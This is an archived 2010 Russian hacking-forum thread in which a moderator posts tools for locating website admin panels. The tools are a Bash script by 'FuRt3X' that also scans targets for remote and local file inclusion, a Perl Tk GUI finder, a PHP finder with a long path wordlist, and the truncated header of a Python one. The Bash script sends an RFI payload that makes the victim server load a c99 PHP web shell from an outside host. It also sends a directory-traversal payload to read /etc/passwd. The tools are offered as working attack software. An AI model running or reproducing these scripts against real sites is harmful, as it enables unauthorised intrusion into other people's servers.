1. Вы находитесь в архивной версии форума xaker.name. Здесь собраны темы с 2007 по 2012 год, большинство инструкций и мануалов уже неактуальны.
    Скрыть объявление

Admin Finders

Тема в разделе "Web-хакинг, уязвимости CMS, эксплоиты", создана пользователем Hookman, 11 дек 2010.

  1. Hookman

    Hookman Developer Глобальный модератор

    Регистрация:
    4 окт 2008
    Сообщения:
    93
    Симпатии:
    220
    Баллы:
    0
    В этой теме постим софт для поиска админки.
    Постинг списков путей приветствуется. Буду обновлять список в софте.


    Admin Login Finder & RFI/LFI Vulnz Scanner [ BASH ]
    Код:
    #!/bin/bash
    
    
    #
    # 88""Yb 88     88  dP     88  88 888888      dP""b8  dP"Yb  88""Yb 88""Yb
    # 88__dP 88     88odP      88  88   88       dP   `" dP   Yb 88__dP 88__dP
    # 88""Yb 88  .o 88"Yb      888888   88       Yb      Yb   dP 88"Yb  88"""
    # 88oodP 88ood8 88  Yb     88  88   88        YboodP  YbodP  88  Yb 88
    #
    # Author: FuRt3X
    # Mail: [email protected]
    #
    #
    # ----> RFI SCANNER  
    # h4x0r(~)$ ./shwebscan -r http://192.168.77.128 /open.php?p= 80
    #[*] Scanning: 192.168.77.128/open.php?p=
    #[*] Aguarde...
    # [======================================]
    # vulnerável: 192.168.77.128/open.php?p=
    #
    #
    # ----> LFI SCANNER
    # h4x0r(~)$ ./shwebscan -l http://192.168.77.128 /open.php?p= 80
    #[*] Scanning: 192.168.77.128/open.php?p=
    #[*] Aguarde...
    # [======================================]
    # vulneravel: 192.168.77.128/open.php?p=
    #
    #
    # ----> ADMIN FINDER
    # h4x0r(~)$ ./shwebscan -a http://192.168.77.128 / 80
    # netcat admin login finder by FuRt3X
    # [email protected]  
    #
    # encontrado: login.html
    #
    #
    #
    #
    #
    for i in {1..3}
    do
      trap "rm -f ${blklog[$i]} 2>/dev/null" 0 1 2 3 15
    done
    
    trap 0 1 2 3 15
    trap "kill 0" 2
    
    
    if [ "$#" = "0" ];
         then
           echo "type flag -h para help"
           exit
    fi
    
    
    ##############
    # Some vars
    ##############
    iface="eth0"
    system=`uname -s`
    httpv="HTTP/1.0"
    blklog[1]="/tmp/rfilogz"
    blklog[2]="/tmp/lfilogz"
    blklog[3]="/tmp/admlogz"
    meuip=`ifconfig ${iface} | awk -F ":"  '/inet /{split($2,a," ");print a[1]}'`
    #SHELL="http://www.saldiri.org/r57.txt?"
    SHELL="http://${meuip}/c99.txt?"
    LFI="../../../../../../../../../../../../etc/passwd%00"
    
    
    
    ######################################
    # Test if system operation is linux
    ######################################
    if [ ${system} != "Linux" ];
      then
         echo "Tested just on linux Debian"
         exit
    fi
    
    
    ###################
    # script menu
    ###################
    function uso() {
    cat <<EOF
    -----------------------------------------------------------------------------------
    [shwebscan]: Coded by FuRt3X ~> [email protected]
    
    [uso]: `basename $0` [option] [vitima]
    
    [Options]:
        -h            Display this menu.
        -r            Rfi scanner.
        -l            Lfi scanner.
        -a            Admin login finder.
    
    examples:
    `basename $0` -r http://www.vitima.com.br /url.php?site= 80
    `basename $0` -l http://www.vitima.com.br /url.php?site= 80
    `basename $0` -a http://www.vitima.com.br / 80
    -----------------------------------------------------------------------------------
    EOF
    exit
    }
    
    
    function rfi_help() {
    cat <<EOF
    `basename $0` -r <url|ip> <path> <porta>
    `basename $0` -r http://www.vitima.com.br /url.php?site= 80
    `basename $0` -r www.vitima.com.br /url.php?site= 80
    EOF
    }
    
    
    function lfi_help() {
    cat <<EOF
    `basename $0` -l <url|ip> <path> <porta>
    `basename $0` -l http://www.vitima.com.br /url.php?site= 80
    `basename $0` -l www.vitima.com.br /url.php?site= 80
    EOF
    }
    
    
    function find_adm() {
    cat <<EOF
    `basename $0` -a <url|ip> <path> <porta>
    `basename $0` -a http://www.vitima.com.br / 80
    `basename $0` -a www.vitima.com.br / 80
    EOF
    }
    
    
    #############################
    # Function color green
    #############################
    function cl_verde(){
    echo -e "\033[01;32m${@}\033[00m"
    }
    
    
    #######################################
    # Function Bar status. just for fun ;)
    #######################################
    function besteira(){
    barra="\033[G\033[@[=\033[40G\033[0K]"
    
    for i in {1..40}; do echo -ne ${barra} ; sleep 0.1; done
    echo
    }
    
    
    function strip_http() { 
    
    if [[  ${vitima} =~ "http://" ]]; then
    vitima=`echo "${vitima}" | cut -c8-`
    
    elif [[ ${vitima} =~ "https://" ]]; then
    vitima=`echo "${vitima}" | cut -c9-`
    fi 
    
    }
    
    
    ################################
    # Function Remote file include
    ################################
    function rfi(){
    
    strip_http
    
    
    cl_verde "netcat rfi scanner by FuRt3X"
    cl_verde "[email protected]"
    echo 
    cl_verde "[*] Scanning: ${vitima}${path}"
    cl_verde "[*] Aguarde..."
    besteira
    sleep 0.1
    
    
    
    #-------------------
    #Sending request
    #-------------------
    echo -ne "GET ${path}${SHELL} ${httpv}\r\n\r\n" \
               "Host: ${vitima}\r\n\r\n" \
               "Connection: close\r\n" | nc -w 3 ${vitima} ${porta} 1>${blklog[1]} 2>${blklog[1]}
    
    
    
    
    #-------------------------------------
    # Search for "phpshell" on log file
    #-------------------------------------
    cat ${blklog[1]} | grep -i "phpshell" >/dev/null
    
    
    
    #----------------------------------------------------------
    # If command cat has return code 0 then url is vulnerable
    #----------------------------------------------------------
    if [ "$?" -eq "0" ]; then
        cl_verde "vulnerável: ${vitima}${path}"
        cl_verde "make sure that ${blklog[1]} has shell" 
        exit
      else
        cl_verde "não vulnerável =("
        exit
    fi
    }
    
    
    
    #############################
    # Funçao Local file include
    #############################
    function lfi(){
    
    strip_http
    
    
    cl_verde "netcat lfi scanner by FuRt3X"
    cl_verde "[email protected]"
    echo
    cl_verde "[*] Scanning: ${vitima}${path}"
    cl_verde "[*] Aguarde..."
    besteira
    sleep 0.1
    
    
    
    
    
    #------------------
    # Sending request
    #------------------
    echo -ne "GET ${path}${LFI} ${httpv}\r\n\r\n" \
               "Host: ${vitima}\r\n\r\n" \
               "Connection: close\r\n" |nc -w 3 ${vitima} ${porta} 1>${blklog[2]} 2>${blklog[2]}
    
    
    
    
    
    
    #----------------------------------------
    # Search for user "root" on log file
    #----------------------------------------
    cat ${blklog[2]} | grep "root:x:0:0" >/dev/null
    
    
    
    #----------------------------------
    # Test return code is successful
    #----------------------------------
    if [ "$?" -eq "0" ];
     then
        cl_verde "vulneravel: ${vitima}${path}"
        cl_verde "make sure that ${blklog[2]} has passwd"
        exit
     else
        cl_verde "nao vulneravel =("
        exit
    fi
    }
    
    
    
    function adm_xploit() {
    
    strip_http
    
    
    #### Admin paineis ####
    #######################
    a[1]="admin/"
    a[2]="admin1.php"
    a[3]="administrador/"
    a[4]="administracao/"
    a[5]="painel/"
    a[6]="administraçao/"
    a[7]="administracao.php"
    a[8]="administraçao.php"
    a[9]="administrateur/"
    a[10]="administrateur.php"
    a[11]="beheerder/"
    a[12]="administracion/"
    a[13]="administracion.php"
    a[14]="beheerder.php"
    a[15]="adminisztrátora/"
    a[16]="adminisztrátora.php"
    a[17]="amministratore/"
    a[18]="amministratore.php"
    a[19]="v2/painel/"
    a[20]="admin1.html"
    a[21]="admin2.php"
    a[22]="admin2.html"
    a[23]="yonetim.php"
    a[24]="yonetim.html"
    a[25]="yonetici.php"
    a[26]="yonetici.html"
    a[27]="ccms/"
    a[28]="ccms/login.php"
    a[29]="ccms/index.php"
    a[30]="maintenance/"
    a[31]="webmaster/"
    a[32]="adm/"
    a[33]="configuration/"
    a[34]="configure/"
    a[35]="websvn/"
    a[36]="admin/account.php"
    a[37]="admin/account.html"
    a[38]="admin/index.php"
    a[39]="admin/index.html"
    a[40]="admin/login.php"
    a[41]="admin/login.html"
    a[42]="admin/home.php"
    a[43]="admin/controlpanel.html"
    a[44]="admin/controlpanel.php"
    a[45]="admin.php"
    a[46]="admin.html"
    a[47]="admin/cp.php"
    a[48]="admin/cp.html"
    a[49]="cp.php"
    a[50]="cp.html"
    a[51]="administrator/"
    a[52]="administrator/index.html"
    a[53]="administrator/index.php"
    a[54]="administrator/login.html"
    a[55]="administrator/login.php"
    a[56]="administrator/account.html"
    a[57]="administrator/account.php"
    a[58]="administrator.php"
    a[59]="administrator.html"
    a[60]="login.php"
    a[61]="login.html"
    a[62]="modelsearch/login.php"
    a[63]="moderator.php"
    a[64]="moderator.html"
    a[65]="moderator/login.php"
    a[66]="moderator/login.html"
    a[67]="moderator/admin.php"
    a[68]="moderator/admin.html"
    a[69]="moderator/"
    a[70]="account.php"
    a[71]="account.html"
    a[72]="controlpanel/"
    a[73]="controlpanel.php"
    a[74]="controlpanel.html"
    a[75]="admincontrol.php"
    a[76]="admincontrol.html"
    a[77]="adminpanel.php"
    a[78]="adminpanel.html"
    a[79]="admin1.asp"
    a[80]="admin2.asp"
    a[81]="yonetim.asp"
    a[82]="yonetici.asp"
    a[83]="admin/account.asp"
    a[84]="admin/index.asp"
    a[85]="admin/login.asp"
    a[86]="admin/home.asp"
    a[87]="admin/controlpanel.asp"
    a[88]="admin.asp"
    a[89]="admin/cp.asp"
    a[90]="cp.asp"
    a[91]="administrator/index.asp"
    a[92]="administrator/login.asp"
    a[93]="administrator/account.asp"
    a[94]="administrator.asp"
    a[95]="login.asp"
    a[96]="modelsearch/login.asp"
    a[97]="moderator.asp"
    a[98]="moderator/login.asp"
    a[99]="moderator/admin.asp"
    a[100]="account.asp"
    a[101]="controlpanel.asp"
    a[102]="admincontrol.asp"
    a[103]="adminpanel.asp"
    a[104]="fileadmin/"
    a[105]="fileadmin.php"
    a[106]="fileadmin.asp"
    a[107]="fileadmin.html"
    a[108]="administration/"
    a[109]="administration.php"
    a[110]="administration.html"
    a[111]="sysadmin.php"
    a[112]="sysadmin.html"
    a[113]="phpmyadmin/"
    a[114]="myadmin/"
    a[115]="sysadmin.asp"
    a[116]="sysadmin/"
    a[117]="ur-admin.asp"
    a[118]="ur-admin.php"
    a[119]="ur-admin.html"
    a[120]="ur-admin/"
    a[121]="Server.php"
    a[122]="Server.html"
    a[123]="Server.asp"
    a[124]="Server/"
    a[125]="wp-admin/"
    a[126]="webadmin/"
    a[127]="webadmin.php"
    a[128]="webadmin.asp"
    a[129]="webadmin.html"
    a[130]="administratie/"
    a[131]="admins/"
    a[132]="admins.php"
    a[133]="admins.asp"
    a[134]="admins.html"
    a[135]="administrivia/"
    a[136]="Database_Administration/"
    a[137]="WebAdmin/"
    a[138]="useradmin/"
    a[139]="sysadmins/"
    a[140]="admin1/"
    a[141]="system-administration/"
    a[142]="administrators/"
    a[143]="directadmin/"
    a[144]="ServerAdministrator/"
    a[145]="SysAdmin/"
    a[146]="administer/"
    a[147]="sys-admin/"
    a[148]="panel/"
    a[149]="cpanel/"
    a[150]="cPanel/"
    a[151]="cpanel_file/"
    a[152]="platz_login/"
    a[153]="rcLogin/"
    a[154]="blogindex/"
    a[155]="formslogin/"
    a[156]="autologin/"
    a[157]="support_login/"
    a[158]="meta_login/"
    a[159]="simpleLogin/"
    a[160]="utility_login/"
    a[161]="members/"
    a[162]="login-redirect/"
    a[163]="wp-login/"
    a[164]="login1/"
    a[165]="dir-login/"
    a[166]="login_db/"
    a[167]="customer_login/"
    a[168]="UserLogin/"
    a[169]="login-us/"
    a[170]="admin_area/"
    a[171]="phppgadmin/"
    a[172]="sql-admin/"
    a[173]="radmind/"
    a[174]="openvpnadmin/"
    a[175]="administratoraccounts/"
    a[176]="admin4_account/"
    a[177]="admin4_colon/"
    a[178]="radmind-1/"
    a[179]="AdminTools/"
    a[180]="cmsadmin/"
    a[181]="SysAdmin2/"
    a[182]="globes_admin/"
    a[183]="cadmins/"
    a[184]="phpSQLiteAdmin/"
    a[185]="logo_sysadmin/"
    a[186]="database_administration/"
    
    
    cl_verde "netcat admin login finder by FuRt3X"
    cl_verde "[email protected]"
    echo
    
    while [[ "$i" -lt "186" ]];
    do
      ((i++))
      echo -ne "GET ${path}${a[$i]} ${httpv}\r\n\r\n" \
               "Host: ${vitima}\r\n\r\n" \
               "Connection: close\r\n" |nc -w 2 ${vitima} 80 1>${blklog[3]} 2>${blklog[3]}
    
      cl_verde "Tentando: ${a[$i]}"
      cat ${blklog[3]} | grep -i "200 OK" >/dev/null
    
    
    if [ "$?" -eq "0" ]; then
       echo
       cl_verde "encontrado: ${a[$i]}"
       exit
    fi
    
    sleep 0.1
    done
    }
    
    
    
    while [ -n "$1" ]; do
            case "$1" in
    
               -r)
                  if [ "$#" -ne "4" ];
                  then rfi_help
                  exit
                  fi
                  OPT=r
                  vitima=$2
                  path=$3
                  porta=$4
                  shift
                  break
                  ;;
    
               -l)
                  if [ "$#" -ne "4" ];
                  then lfi_help
                  exit
                  fi      
            
                  OPT=l
                  vitima=$2
                  path=$3
                  porta=$4
                  shift
                  break ;; 
    
                
               -a)
                  if [ "$#" -ne "4" ];
                  then find_adm
                  exit
                  fi
                  OPT=a
                  vitima=$2
                  path=$3
                  porta=$4
                  shift
                  break ;;
    
               -h)uso
                  exit ;;
    
                *)uso
                  exit ;;
    esac
    
    shift
    done
    
    case $OPT in
    
            r)rfi ;;
            l)lfi ;;
            a)adm_xploit;;
    esac
     
  2. Hookman

    Hookman Developer Глобальный модератор

    Регистрация:
    4 окт 2008
    Сообщения:
    93
    Симпатии:
    220
    Баллы:
    0
    Admin Control Panel Finder v1.2 [ PERL ]
    Код:
    #!usr/bin/perl
    
    ##
    # Coded By KuNdUz
    ##
    
    use Tk;
    use HTTP::Request;
    use LWP::UserAgent;
    
    $mw = MainWindow->new( -background => "black", -cursor=>"crosshair");
    $mw->geometry("1070x325+100+300");
    $mw->title("|_^_| Admin Control Panel Finder v1.2 |_^_|");
    $mw->resizable(0,0);
    
    $statusbar = "|_^_| Admin Control Panel Finder v1.2 |_^_|";
    $statusbottom = $mw->Label(-textvariable => \$statusbar, -relief => 'flat', -background => "black", -foreground => "red", -font => "Verdana 7", -width => 120)->place(-x => 240, -y => 307);
    $mw->Label(-background => "black", -foreground => "black")->pack();
    $stat = "Control Panel Found";
    $sta = $mw->Label(-textvariable => \$stat, -relief => 'flat', -background => "black", -foreground => "red", -font => "Verdana 9")->place(-x => 380, -y => 10);
    $stat1 = "Control Panel Not Found";
    $st = $mw->Label(-textvariable => \$stat1, -relief => 'flat', -background => "black", -foreground => "red", -font => "Verdana 9")->place(-x => 786, -y => 10);
    $test1 = $mw->Scrolled("Text", -scrollbars => 'oe', -font => "Verdana 8", -background => "black", -foreground => "red", -selectbackground => "red", -insertbackground => "red", -relief => "ridge", -width => 55, -height=> 20)->pack(-side => 'right', -anchor => 'e');
    $test2 = $mw->Scrolled("Text", -scrollbars => 'oe', -font => "Verdana 8", -background => "black", -foreground => "red", -selectbackground => "red", -insertbackground => "red", -relief => "ridge", -width => 55, -height=> 20)->pack(-side => 'right', -anchor => 'e');
    $mw->Label(-background => "black", -foreground => "black")->pack();
    $mw->Label(-background => "black", -foreground => "black")->pack();
    $mw->Label(-background => "black", -foreground => "black")->pack();
    $mw->Label(-background => "black", -foreground => "red", -font => "Verdana 9", -text => "                    Enter Site ")->pack(-anchor => 'nw');
    $mw->Entry(-background => "black", -foreground => "red", -selectbackground => "black", -insertbackground => "red", -width => 40, -relief => "ridge", -textvariable => \$site)->pack(-anchor => 'nw');
    $mw->Label(-background => "black", -foreground => "red", -font => "Verdana 9", -text => "          Enter Site Source Code ")->pack(-anchor => 'nw');
    $mw->Entry(-background => "black", -foreground => "red", -selectbackground => "black", -insertbackground => "red", -width => 40, -relief => "ridge", -textvariable => \$code)->pack(-anchor => 'nw');
    $mw->Label(-background => "black", -foreground => "black")->pack();
    $mw->Label(-background => "black", -foreground => "black")->pack();
    $mw->Button(-activebackground => "red",  -activeforeground => "black",  -background => "black", -foreground => "red", -font => "Verdana 7", -relief => "groove", -text => "Start", -width => 5, -command => \&scan)->place(-x => 40, -y => 190);
    $mw->Button(-activebackground => "red",  -activeforeground => "black",  -background => "black", -foreground => "red", -font => "Verdana 7", -relief => "groove", -text => "Stop", -width => 5, -command => \&sto )->place(-x => 95, -y => 190);
    $mw->Button(-activebackground => "red",  -activeforeground => "black",  -background => "black", -foreground => "red", -font => "Verdana 7", -relief => "groove", -text => "Clear",  -width => 5, -command => \&cle)->place(-x => 150, -y => 190);
    $mw->Button(-activebackground => "red",  -activeforeground => "black",  -background => "black", -foreground => "red", -font => "Verdana 7", -relief => "groove", -text => "Help/About", -width => 9, -command => \&heaab)->place(-x => 50, -y => 240);
    $mw->Button(-activebackground => "red",  -activeforeground => "black",  -background => "black", -foreground => "red", -font => "Verdana 7", -relief => "groove", -text => "Exit",  -width => 5, -command => sub { exit })->place(-x => 133, -y => 240);
    
    MainLoop;
    
    sub heaab {
    $about = $mw->Toplevel(-background => "black", -cursor=>"crosshair");
    $about->geometry("500x422+425+250");
    $about->title("|_^_| Admin Control Panel Finder v1.2 |_^_|");
    $about->resizable(0,0);
    $about->Label(-background => "black", -foreground=>"red")->pack();
    $about->Label(-background => "black", -foreground=>"red", -font=> "Cambria 10", -text => "|_^_| Admin Control Panel Finder v1.2 Help |_^_|\n")->pack();
    $about->Label(-background => "black", -foreground=>"red", -font=> "Cambria 10",  -text => " -Enter Site-\nEnter Target address,\n exemplarily www.site.com or www.site.com/path")->pack();
    $about->Label(-background => "black", -foreground=>"red", -font=> "Cambria 10",  -text => " -Enter Site Source Code-\nEnter target site source code.\n Site source code php is the write php or\n Site source code asp is the write asp")->pack();
    $about->Label(-background => "black", -foreground=>"red", -font=> "Cambria 10",  -text => "\nEx:\n Enter Site : www.target.com\n Enter Site Source Code : php")->pack();
    $about->Label(-background => "black", -foreground=>"red")->pack();
    $about->Label(-background => "black", -foreground=>"red", -font=> "Cambria 10", -text => "|_^_| Admin Control Panel Finder v1.2 About |_^_|\n")->pack();
    $about->Label(-background => "black",-foreground => "red",-font => "wingdings 22", -text => "7")->pack();
    $about->Label(-background => "black", -foreground=>"red", -font=> "Cambria 11",  -text => "Coded By KuNdUz")->pack();
    $about->Label(-background => "black", -foreground=>"red", -font=> "Cambria 11",  -text => "Enjoy! :)")->pack();
    $about->Label(-background => "black", -foreground => "red", -font => "Cambria 8",  -text => "10/12/2008")->pack(-anchor => "se");
    $about->Button(-activebackground => "red",  -activeforeground => "black",  -background => "black", -foreground => "red", -relief => "groove", -font=> "Verdana 7", -text => "Exit", -command => [$about => 'destroy'])->pack(-fill => "both");
    }
    
    sub cle {
    $test1->delete("0.0", "end");
    $test2->delete("0.0", "end");
    }
    
    sub sto {
    $sisite = "",
    $ways = "",
    @path1 = ""
    }
    
    sub scan {
    
    $test1->delete("0.0", "end");
    $test2->delete("0.0", "end");
    
    $sisite = $site;
    
    if ( $sisite !~ /^http:/ ) {
    $sisite = 'http://' . $sisite;
    }
    if ( $sisite !~ /\/$/ ) {
    $sisite = $sisite . '/';
    }
    
    if($code eq "php"){
    @path1=('admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
    'memberadmin/','administratorlogin/','adm/','admin/account.php','admin/index.php','admin/login.php','admin/admin.php','admin/account.php',
    'admin_area/admin.php','admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
    'admin_area/index.php','bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html',
    'admin/controlpanel.php','admin.php','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
    'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html',
    'admin/cp.php','cp.php','administrator/index.php','administrator/login.php','nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php',
    'administrator/account.php','administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php',
    'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.php','modelsearch/login.php','moderator.php','moderator/login.php',
    'moderator/admin.php','account.php','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php',
    'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php','adminarea/index.html','adminarea/admin.html',
    'webadmin.php','webadmin/index.php','webadmin/admin.php','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.html',
    'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html',
    'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html',
    'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpanel.html','admincontrol.html',
    'panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','admin.php','adminarea/index.php',
    'adminarea/admin.php','adminarea/login.php','panel-administracion/index.php','panel-administracion/admin.php','modelsearch/index.php',
    'modelsearch/admin.php','admincontrol/login.php','adm/admloginuser.php','admloginuser.php','admin2.php','admin2/login.php','admin2/index.php',
    'adm/index.php','adm.php','affiliate.php','adm_auth.php','memberadmin.php','administratorlogin.php'
    );
    
    foreach $ways(@path1){
    $statusbar = "Scaning path: " . $ways;
    $statusbottom->update();
    $statusbar = "|_^_| Admin Control Panel Finder v1.2 |_^_|";
    $final=$sisite.$ways;
    $req=HTTP::Request->new(GET=>$final);
    $ua=LWP::UserAgent->new();
    $ua->timeout(30);
    $response=$ua->request($req);
    
    if($response->content =~ /Username/ ||
    $response->content =~ /Password/ ||
    $response->content =~ /username/ ||
    $response->content =~ /password/ ||
    $response->content =~ /USERNAME/ ||
    $response->content =~ /PASSWORD/ ||
    $response->content =~ /Senha/ ||
    $response->content =~ /senha/ ||
    $response->content =~ /Personal/ ||
    $response->content =~ /Usuario/ ||
    $response->content =~ /Clave/ ||
    $response->content =~ /Usager/ ||
    $response->content =~ /usager/ ||
    $response->content =~ /Sing/ ||
    $response->content =~ /passe/ ||
    $response->content =~ /P\/W/ || 
    $response->content =~ /Admin Password/
    ){
    $test2->insert('end', $final."\n");
    }else{
    $test1->insert('end', $final."\n");
    }
    }
    }
    
    if($code eq "asp"){
    @path1=('admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
    'memberadmin/','administratorlogin/','adm/','account.asp','admin/account.asp','admin/index.asp','admin/login.asp','admin/admin.asp',
    'admin_area/admin.asp','admin_area/login.asp','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
    'admin_area/admin.html','admin_area/login.html','admin_area/index.html','admin_area/index.asp','bb-admin/index.asp','bb-admin/login.asp','bb-admin/admin.asp',
    'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','admin/controlpanel.html','admin.html','admin/cp.html','cp.html',
    'administrator/index.html','administrator/login.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator.html',
    'moderator/login.html','moderator/admin.html','account.html','controlpanel.html','admincontrol.html','admin_login.html','panel-administracion/login.html',
    'admin/home.asp','admin/controlpanel.asp','admin.asp','pages/admin/admin-login.asp','admin/admin-login.asp','admin-login.asp','admin/cp.asp','cp.asp',
    'administrator/account.asp','administrator.asp','login.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','administrator/login.asp',
    'moderator/admin.asp','controlpanel.asp','admin/account.html','adminpanel.html','webadmin.html','pages/admin/admin-login.html','admin/admin-login.html',
    'webadmin/index.html','webadmin/admin.html','webadmin/login.html','user.asp','user.html','admincp/index.asp','admincp/login.asp','admincp/index.html',
    'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','adminarea/index.html','adminarea/admin.html','adminarea/login.html',
    'panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admin/admin_login.html',
    'admincontrol/login.html','adm/index.html','adm.html','admincontrol.asp','admin/account.asp','adminpanel.asp','webadmin.asp','webadmin/index.asp',
    'webadmin/admin.asp','webadmin/login.asp','admin/admin_login.asp','admin_login.asp','panel-administracion/login.asp','adminLogin.asp',
    'admin/adminLogin.asp','home.asp','admin.asp','adminarea/index.asp','adminarea/admin.asp','adminarea/login.asp','admin-login.html',
    'panel-administracion/index.asp','panel-administracion/admin.asp','modelsearch/index.asp','modelsearch/admin.asp','administrator/index.asp',
    'admincontrol/login.asp','adm/admloginuser.asp','admloginuser.asp','admin2.asp','admin2/login.asp','admin2/index.asp','adm/index.asp',
    'adm.asp','affiliate.asp','adm_auth.asp','memberadmin.asp','administratorlogin.asp','siteadmin/login.asp','siteadmin/index.asp','siteadmin/login.html'
    );
    
    foreach $ways(@path1){
    $statusbar = "Scaning path: " . $ways;
    $statusbottom->update();
    $statusbar = "|_^_| Admin Control Panel Finder v1.2 |_^_|";
    $final=$sisite.$ways;
    $req=HTTP::Request->new(GET=>$final);
    $ua=LWP::UserAgent->new();
    $ua->timeout(30);
    $response=$ua->request($req);
    
    if($response->content =~ /Username/ ||
    $response->content =~ /Password/ ||
    $response->content =~ /username/ ||
    $response->content =~ /password/ ||
    $response->content =~ /USERNAME/ ||
    $response->content =~ /PASSWORD/ ||
    $response->content =~ /Senha/ ||
    $response->content =~ /senha/ ||
    $response->content =~ /Personal/ ||
    $response->content =~ /Usuario/ ||
    $response->content =~ /Clave/ ||
    $response->content =~ /Usager/ ||
    $response->content =~ /usager/ ||
    $response->content =~ /Sing/ ||
    $response->content =~ /passe/ ||
    $response->content =~ /P\/W/ || 
    $response->content =~ /Admin Password/
    ){
    $test2->insert('end', $final."\n");
    }else{
    $test1->insert('end', $final."\n");
    }
    }
    }
    }
    
    ##
    # Coded By KuNdUz
    ##
    
    Admin Finder [ PHP ]
    PHP:
    <title>Neutralised- Admin Finder</title>
    <form action="" method="post">
    <p class="frontboxtext"><input name="hash_lol" class="textbox" type="text" size="30" value="http://www.example.com/"/>
    <input name="submit_lol" class="textbox" value="Submit Site" type="submit">
    </form>
    <?php
    set_time_limit
    (0);

    if (isset(
    $_POST["submit_lol"])) {
    $url $_POST['hash_lol'];
    echo 
    "<br />Testing ".$url."<br /><br />";

    $adminlocales = array("admin1.php""admin1.html""admin2.php""admin2.html""yonetim.php""yonetim.html""yonetici.php""yonetici.html""ccms/""ccms/login.php""ccms/index.php""maintenance/""webmaster/""adm/""configuration/""configure/""websvn/""admin/""admin/account.php""admin/account.html""admin/index.php""admin/index.html""admin/login.php""admin/login.html""admin/home.php""admin/controlpanel.html""admin/controlpanel.php""admin.php""admin.html""admin/cp.php""admin/cp.html""cp.php""cp.html""administrator/""administrator/index.html""administrator/index.php""administrator/login.html""administrator/login.php""administrator/account.html""administrator/account.php""administrator.php""administrator.html""login.php""login.html""modelsearch/login.php""moderator.php""moderator.html""moderator/login.php""moderator/login.html""moderator/admin.php""moderator/admin.html""moderator/""account.php""account.html""controlpanel/""controlpanel.php""controlpanel.html""admincontrol.php""admincontrol.html""adminpanel.php""adminpanel.html""admin1.asp""admin2.asp""yonetim.asp""yonetici.asp""admin/account.asp""admin/index.asp""admin/login.asp""admin/home.asp""admin/controlpanel.asp""admin.asp""admin/cp.asp""cp.asp""administrator/index.asp""administrator/login.asp""administrator/account.asp""administrator.asp""login.asp""modelsearch/login.asp""moderator.asp""moderator/login.asp""moderator/admin.asp""account.asp""controlpanel.asp""admincontrol.asp""adminpanel.asp""fileadmin/""fileadmin.php""fileadmin.asp""fileadmin.html""administration/""administration.php""administration.html""sysadmin.php""sysadmin.html""phpmyadmin/""myadmin/""sysadmin.asp""sysadmin/""ur-admin.asp""ur-admin.php""ur-admin.html""ur-admin/""Server.php""Server.html""Server.asp""Server/""wp-admin/""administr8.php""administr8.html""administr8/""administr8.asp""webadmin/""webadmin.php""webadmin.asp""webadmin.html""administratie/""admins/""admins.php""admins.asp""admins.html""administrivia/""Database_Administration/""WebAdmin/""useradmin/""sysadmins/""admin1/""system-administration/""administrators/""pgadmin/""directadmin/""staradmin/""ServerAdministrator/""SysAdmin/""administer/""LiveUser_Admin/""sys-admin/""typo3/""panel/""cpanel/""cPanel/""cpanel_file/""platz_login/""rcLogin/""blogindex/""formslogin/""autologin/""support_login/""meta_login/""manuallogin/""simpleLogin/""loginflat/""utility_login/""showlogin/""memlogin/""members/""login-redirect/""sub-login/""wp-login/""login1/""dir-login/""login_db/""xlogin/""smblogin/""customer_login/""UserLogin/""login-us/""acct_login/""admin_area/""bigadmin/""project-admins/""phppgadmin/""pureadmin/""sql-admin/""radmind/""openvpnadmin/""wizmysqladmin/""vadmind/""ezsqliteadmin/""hpwebjetadmin/""newsadmin/""adminpro/""Lotus_Domino_Admin/""bbadmin/""vmailadmin/""Indy_admin/""ccp14admin/""irc-macadmin/""banneradmin/""sshadmin/""phpldapadmin/""macadmin/""administratoraccounts/""admin4_account/""admin4_colon/""radmind-1/""Super-Admin/""AdminTools/""cmsadmin/""SysAdmin2/""globes_admin/""cadmins/""phpSQLiteAdmin/""navSiteAdmin/""server_admin_small/""logo_sysadmin/""server/""database_administration/""power_user/""system_administration/""ss_vms_admin_sm/");

    foreach (
    $adminlocales as $admin){
    $headers get_headers("$url$admin");
    if (
    eregi('200'$headers[0])) {
        echo 
    "<a href='$url$admin'>$url$admin</a> Found!<br />";
    }
    else {
        echo 
    "$url$admin NOT Found!<br />";
    }
    }
    }
    ?>
    Admin login finder [ python ]
    Код:
    од:
    #/usr/bin/python
    # This was written for educational purpose only. Use it at your own risk.
    # Author will be not responsible for any damage!
    # !!! Special greetz for my friend sinner_01 !!!
    # !!! Special thanx for d3hydr8 and rsauron who inspired me !!! 
    #
    ################################################################ 
    #       .___             __          _______       .___        # 
    #     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
